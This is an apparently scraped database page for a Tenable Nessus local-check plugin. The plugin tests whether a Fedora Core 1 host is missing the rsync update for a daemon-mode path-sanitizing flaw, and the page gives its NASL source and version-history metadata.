ID FEDORA_2004-268.NASL Type nessus Reporter This script is Copyright (C) 2004-2019 Tenable Network Security, Inc. Modified 2019-11-02T00:00:00
Description
This update backports a security fix to a path-sanitizing flaw that
affects rsync when it is used in daemon mode without also using
chroot. For more information see
http://samba.org/rsync/#security_aug04
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues.
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory 2004-268.
#
include("compat.inc");
if (description)
{
script_id(14320);
script_version ("1.15");
script_cvs_date("Date: 2019/08/02 13:32:23");
script_xref(name:"FEDORA", value:"2004-268");
script_name(english:"Fedora Core 1 : rsync-2.5.7-5.fc1.1 (2004-268)");
script_summary(english:"Checks rpm output for the updated packages.");
script_set_attribute(
attribute:"synopsis",
value:"The remote Fedora Core host is missing a security update."
);
script_set_attribute(
attribute:"description",
value:
"This update backports a security fix to a path-sanitizing flaw that
affects rsync when it is used in daemon mode without also using
chroot. For more information see
http://samba.org/rsync/#security_aug04
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
);
script_set_attribute(
attribute:"see_also",
value:"http://samba.org/rsync/#security_aug04"
);
# https://lists.fedoraproject.org/pipermail/announce/2004-August/000265.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?7aba8938"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected rsync and / or rsync-debuginfo packages."
);
script_set_attribute(attribute:"risk_factor", value:"High");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:rsync");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:rsync-debuginfo");
script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora_core:1");
script_set_attribute(attribute:"patch_publication_date", value:"2004/08/19");
script_set_attribute(attribute:"plugin_publication_date", value:"2004/08/20");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.");
script_family(english:"Fedora Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^1([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 1.x", "Fedora " + os_ver);
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
flag = 0;
if (rpm_check(release:"FC1", reference:"rsync-2.5.7-5.fc1.1")) flag++;
if (rpm_check(release:"FC1", reference:"rsync-debuginfo-2.5.7-5.fc1.1")) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
else security_hole(0);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "rsync / rsync-debuginfo");
}
{"id": "FEDORA_2004-268.NASL", "bulletinFamily": "scanner", "title": "Fedora Core 1 : rsync-2.5.7-5.fc1.1 (2004-268)", "description": "This update backports a security fix to a path-sanitizing flaw that\naffects rsync when it is used in daemon mode without also using\nchroot. For more information see\nhttp://samba.org/rsync/#security_aug04\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2004-08-20T00:00:00", "modified": "2019-11-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.tenable.com/plugins/nessus/14320", "reporter": "This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.", "references": ["http://www.nessus.org/u?7aba8938", "http://samba.org/rsync/#security_aug04"], "cvelist": [], "type": "nessus", "lastseen": "2019-11-01T02:26:28", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "This update backports a security fix to a path-sanitizing flaw that affects rsync when it is used in daemon mode without also using chroot. For more information see http://samba.org/rsync/#security_aug04\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "enchantments": {}, "hash": "e619b36793f66fc8e4bb02c99b49e34d62c75e20e42343e316cb17ef2ef2458b", "hashmap": [{"hash": "1fb9a956dabb656e30de77a1a3f76578", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "33edf41c0becd0d57c35c4e27276617b", "key": "pluginID"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d7108e7210c9d54f2da425d97c39c85b", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "fd7c7cbf2accf86a98a1de4f85eb690b", "key": "description"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "eed59b0fba7015cbd7c7b1fbffcf4e7e", "key": "sourceData"}, {"hash": "55c15b2ee014f410bc35a2ea45f82539", "key": "modified"}, {"hash": "8d049d70b5c8343b4bfd590d8fa17828", "key": "published"}, {"hash": "57806126cf0c19f7800f2450c62b6976", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=14320", "id": "FEDORA_2004-268.NASL", "lastseen": "2016-09-26T17:23:38", "modified": "2015-10-21T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.2", "pluginID": "14320", "published": "2004-08-20T00:00:00", "references": ["http://www.nessus.org/u?7aba8938", "http://samba.org/rsync/#security_aug04"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-268.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14320);\n script_version (\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2015/10/21 21:09:31 $\");\n\n script_xref(name:\"FEDORA\", value:\"2004-268\");\n\n script_name(english:\"Fedora Core 1 : rsync-2.5.7-5.fc1.1 (2004-268)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update backports a security fix to a path-sanitizing flaw that\naffects rsync when it is used in daemon mode without also using\nchroot. For more information see\nhttp://samba.org/rsync/#security_aug04\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://samba.org/rsync/#security_aug04\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-August/000265.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7aba8938\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rsync and / or rsync-debuginfo packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rsync\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rsync-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 1.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC1\", reference:\"rsync-2.5.7-5.fc1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"rsync-debuginfo-2.5.7-5.fc1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rsync / rsync-debuginfo\");\n}\n", "title": "Fedora Core 1 : rsync-2.5.7-5.fc1.1 (2004-268)", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:23:38"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:fedoraproject:fedora:rsync-debuginfo", "cpe:/o:fedoraproject:fedora_core:1", "p-cpe:/a:fedoraproject:fedora:rsync"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "This update backports a security fix to a path-sanitizing flaw that\naffects rsync when it is used in daemon mode without also using\nchroot. For more information see\nhttp://samba.org/rsync/#security_aug04\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 4, "enchantments": {"dependencies": {"modified": "2019-01-16T20:05:35", "references": []}, "score": {"value": 2.1, "vector": "NONE"}}, "hash": "f6a2755b2396398c04d4a61b1f3044901888beda2b6e0128fe65675fe6871bd9", "hashmap": [{"hash": "e2914120514a29eeccc01e381df164d8", "key": "modified"}, {"hash": "1fb9a956dabb656e30de77a1a3f76578", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "33edf41c0becd0d57c35c4e27276617b", "key": "pluginID"}, {"hash": "ed1583cd32f2c215efa9a303dcb371fe", "key": "description"}, {"hash": "9e0167a9a2bba7a60263f4638bf6bc04", "key": "cpe"}, {"hash": "44357bc5453f1293d8b360753d32fbd4", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d7108e7210c9d54f2da425d97c39c85b", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "8d049d70b5c8343b4bfd590d8fa17828", "key": "published"}, {"hash": "57806126cf0c19f7800f2450c62b6976", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=14320", "id": "FEDORA_2004-268.NASL", "lastseen": "2019-01-16T20:05:35", "modified": "2018-07-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "14320", "published": "2004-08-20T00:00:00", "references": ["http://www.nessus.org/u?7aba8938", "http://samba.org/rsync/#security_aug04"], "reporter": "Tenable", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-268.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14320);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2018/07/19 23:19:04\");\n\n script_xref(name:\"FEDORA\", value:\"2004-268\");\n\n script_name(english:\"Fedora Core 1 : rsync-2.5.7-5.fc1.1 (2004-268)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update backports a security fix to a path-sanitizing flaw that\naffects rsync when it is used in daemon mode without also using\nchroot. For more information see\nhttp://samba.org/rsync/#security_aug04\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://samba.org/rsync/#security_aug04\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-August/000265.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7aba8938\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rsync and / or rsync-debuginfo packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rsync\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rsync-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 1.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC1\", reference:\"rsync-2.5.7-5.fc1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"rsync-debuginfo-2.5.7-5.fc1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rsync / rsync-debuginfo\");\n}\n", "title": "Fedora Core 1 : rsync-2.5.7-5.fc1.1 (2004-268)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 4, "lastseen": "2019-01-16T20:05:35"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:fedoraproject:fedora:rsync-debuginfo", "cpe:/o:fedoraproject:fedora_core:1", "p-cpe:/a:fedoraproject:fedora:rsync"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "This update backports a security fix to a path-sanitizing flaw that affects rsync when it is used in daemon mode without also using chroot. For more information see http://samba.org/rsync/#security_aug04\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "enchantments": {"dependencies": {"modified": "2019-02-21T01:08:03", "references": []}, "score": {"modified": "2019-02-21T01:08:03", "value": 0.0, "vector": "NONE"}}, "hash": "e38886282137df255726bf7ad7f866b9bea5d9c4535e43df299ffb2d39528c4e", "hashmap": [{"hash": "e2914120514a29eeccc01e381df164d8", "key": "modified"}, {"hash": "1fb9a956dabb656e30de77a1a3f76578", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "33edf41c0becd0d57c35c4e27276617b", "key": "pluginID"}, {"hash": "9e0167a9a2bba7a60263f4638bf6bc04", "key": "cpe"}, {"hash": "44357bc5453f1293d8b360753d32fbd4", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d7108e7210c9d54f2da425d97c39c85b", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "fd7c7cbf2accf86a98a1de4f85eb690b", "key": "description"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "8d049d70b5c8343b4bfd590d8fa17828", "key": "published"}, {"hash": "57806126cf0c19f7800f2450c62b6976", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=14320", "id": "FEDORA_2004-268.NASL", "lastseen": "2019-02-21T01:08:03", "modified": "2018-07-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "14320", "published": "2004-08-20T00:00:00", "references": ["http://www.nessus.org/u?7aba8938", "http://samba.org/rsync/#security_aug04"], "reporter": "Tenable", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-268.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14320);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2018/07/19 23:19:04\");\n\n script_xref(name:\"FEDORA\", value:\"2004-268\");\n\n script_name(english:\"Fedora Core 1 : rsync-2.5.7-5.fc1.1 (2004-268)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update backports a security fix to a path-sanitizing flaw that\naffects rsync when it is used in daemon mode without also using\nchroot. For more information see\nhttp://samba.org/rsync/#security_aug04\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://samba.org/rsync/#security_aug04\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-August/000265.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7aba8938\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rsync and / or rsync-debuginfo packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rsync\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rsync-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 1.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC1\", reference:\"rsync-2.5.7-5.fc1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"rsync-debuginfo-2.5.7-5.fc1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rsync / rsync-debuginfo\");\n}\n", "title": "Fedora Core 1 : rsync-2.5.7-5.fc1.1 (2004-268)", "type": "nessus", "viewCount": 0}, "differentElements": ["description", "reporter", "modified", "sourceData", "href"], "edition": 5, "lastseen": "2019-02-21T01:08:03"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:fedoraproject:fedora:rsync-debuginfo", "cpe:/o:fedoraproject:fedora_core:1", "p-cpe:/a:fedoraproject:fedora:rsync"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "This update backports a security fix to a path-sanitizing flaw that affects rsync when it is used in daemon mode without also using chroot. For more information see http://samba.org/rsync/#security_aug04\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 3, "enchantments": {"score": {"value": 2.1, "vector": "NONE"}}, "hash": "e38886282137df255726bf7ad7f866b9bea5d9c4535e43df299ffb2d39528c4e", "hashmap": [{"hash": "e2914120514a29eeccc01e381df164d8", "key": "modified"}, {"hash": "1fb9a956dabb656e30de77a1a3f76578", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "33edf41c0becd0d57c35c4e27276617b", "key": "pluginID"}, {"hash": "9e0167a9a2bba7a60263f4638bf6bc04", "key": "cpe"}, {"hash": "44357bc5453f1293d8b360753d32fbd4", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d7108e7210c9d54f2da425d97c39c85b", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "fd7c7cbf2accf86a98a1de4f85eb690b", "key": "description"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "8d049d70b5c8343b4bfd590d8fa17828", "key": "published"}, {"hash": "57806126cf0c19f7800f2450c62b6976", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=14320", "id": "FEDORA_2004-268.NASL", "lastseen": "2018-08-02T07:39:51", "modified": "2018-07-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "14320", "published": "2004-08-20T00:00:00", "references": ["http://www.nessus.org/u?7aba8938", "http://samba.org/rsync/#security_aug04"], "reporter": "Tenable", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-268.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14320);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2018/07/19 23:19:04\");\n\n script_xref(name:\"FEDORA\", value:\"2004-268\");\n\n script_name(english:\"Fedora Core 1 : rsync-2.5.7-5.fc1.1 (2004-268)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update backports a security fix to a path-sanitizing flaw that\naffects rsync when it is used in daemon mode without also using\nchroot. For more information see\nhttp://samba.org/rsync/#security_aug04\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://samba.org/rsync/#security_aug04\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-August/000265.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7aba8938\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rsync and / or rsync-debuginfo packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rsync\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rsync-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 1.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) 